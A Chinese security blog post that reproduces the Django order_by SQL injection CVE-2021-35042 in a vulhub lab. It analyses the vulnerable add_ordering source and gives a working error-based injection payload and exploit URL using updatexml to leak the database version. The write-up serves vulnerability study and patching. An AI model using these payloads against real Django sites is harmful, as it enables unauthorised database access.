Django SQL注入漏洞(CVE-2021-35042)

admin 2021年10月29日18:27:00安全漏洞评论148 views2650字阅读8分50秒阅读模式

原创文章web安全漏洞复现

原创声明:转载本文请标注出处和作者!


一、漏洞详情

Django是Python Web中最流行的几个框架之一。Django中QuerySet数据合集的order_by函数存在SQL注入漏洞。如果攻击者可以控制order_by传入的值,那么就可以注入恶意SQL语句造成SQL注入漏洞。


漏洞影响:django 3.1、3.2


二、漏洞分析

1. Django的models概念

在Django中,想要在数据库中创建表并定义字段是容易的,只需要在models.py文件中声明一个模型类即可。如下图所示,这里定义了一个叫Collection的表,表中有一个叫name的字段。

Django SQL注入漏洞(CVE-2021-35042)

Django SQL注入漏洞(CVE-2021-35042)

2. QuerySet与order_by

Django内置了一个ORM框架,从数据库查询出来的结果是一个合集,这个合集就是QuerySet。而order_by这个方法的作用,一般是将查询出来的结果按照某字段的值,由小到大或由大到小进行排序。如下图所示,在views.py的视图函数中,先是获取到了用户传入的参数值order(如果没有传入参数默认值为id)。然后到Collection表中进行数据查询,对返回的结果按照id值从小到大进行排序。

Django SQL注入漏洞(CVE-2021-35042)

最后使用values()函数将数据合集转化成一个一个json的数据格式返回。

Django SQL注入漏洞(CVE-2021-35042)

3. 判断是否使用了order_by

比如返回的结果按照id值排序Collection.objects.order_by('id') ,默认是从小到大的顺序。如果想要变成从大到小,只需要把'id'变成'-id'即可。因此可以通过在参数值前面加'-'来判断,如果返回的顺序颠倒了那么就是使用了order_by。如下图所示。

Django SQL注入漏洞(CVE-2021-35042)

4. 源码分析

当运行到Collection.objects.order_by('id')的时候,主要是进入如下函数来判断order_by 的排序顺序和表达式。

def add_ordering(self, *ordering):        """        Add items from the 'ordering' sequence to the query's "order by"        clause. These items are either field names (not column names) --        possibly with a direction prefix ('-' or '?') -- or OrderBy        expressions.        If 'ordering' is empty, clear all ordering from the query.        """        errors = []        for item in ordering:            if isinstance(item, str):                if '.' in item:                    warnings.warn(                        'Passing column raw column aliases to order_by() is '                        'deprecated. Wrap %r in a RawSQL expression before '                        'passing it to order_by().' % item,                        category=RemovedInDjango40Warning,                        stacklevel=3,                    )                    continue                if item == '?':                    continue                if item.startswith('-'):                    item = item[1:]                if item in self.annotations:                    continue                if self.extra and item in self.extra:                    continue                # names_to_path() validates the lookup. A descriptive                # FieldError will be raise if it's not.                self.names_to_path(item.split(LOOKUP_SEP), self.model._meta)            elif not hasattr(item, 'resolve_expression'):                errors.append(item)            if getattr(item, 'contains_aggregate', False):                raise FieldError(                    'Using an aggregate in order_by() without also including '                    'it in annotate() is not allowed: %s' % item                )        if errors:            raise FieldError('Invalid order_by arguments: %s' % errors)        if ordering:            self.order_by += ordering        else:            self.default_ordering = False

在add_ordering()函数中,进行如下了五个判断:字段中是否带点、字段是否为问号、字段开头是否为短横杠、判断是否在一个map字典、判断是否有额外的参数信息。如果全部参数无异常会进入self.names_to_path中进行数据获取,并进行相关逻辑处理,这个过程是不会进行SQL注入拼接的。

当用户输入的字段中带了点'id.',就会跳出循环进入到_fetch_all中,这个时候会进行SQL查询:

SELECT "vuln_collection"."id", "vuln_collection"."name" FROM "vuln_collection" ORDER BY ("id".) ASC

Django SQL注入漏洞(CVE-2021-35042)

可以看到会把点带进查询。也就是说把'id.'进行了拼接。因此可以尝试闭合语句并配合debug回显进行报错注入:

SELECT "vuln_collection"."id", "vuln_collection"."name" FROM "vuln_collection" ORDER BY (vuln_collection.id);select updatexml(1,concat(0x7e,(select @@version)),1);# ASC

Django SQL注入漏洞(CVE-2021-35042)


三、漏洞利用

  1. 利用vulhub启动漏洞环境。

Django SQL注入漏洞(CVE-2021-35042)

  1. 通过'-'判断order_by:

Django SQL注入漏洞(CVE-2021-35042)

  1. 闭合方法:APP名_数据库名.数据库存在的字段名);

http://192.168.2.129:8000/vuln/?order=vuln_collection.id);select%20updatexml(1,concat(0x7e,(select%[email protected]@version)),1)%23

Django SQL注入漏洞(CVE-2021-35042)


四、漏洞修复

    升级到3.2以上的安全版本。


本文始发于微信公众号(Fighter安全团队):Django SQL注入漏洞(CVE-2021-35042)

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年10月29日18:27:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Django SQL注入漏洞(CVE-2021-35042) http://cn-sec.com/archives/457204.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: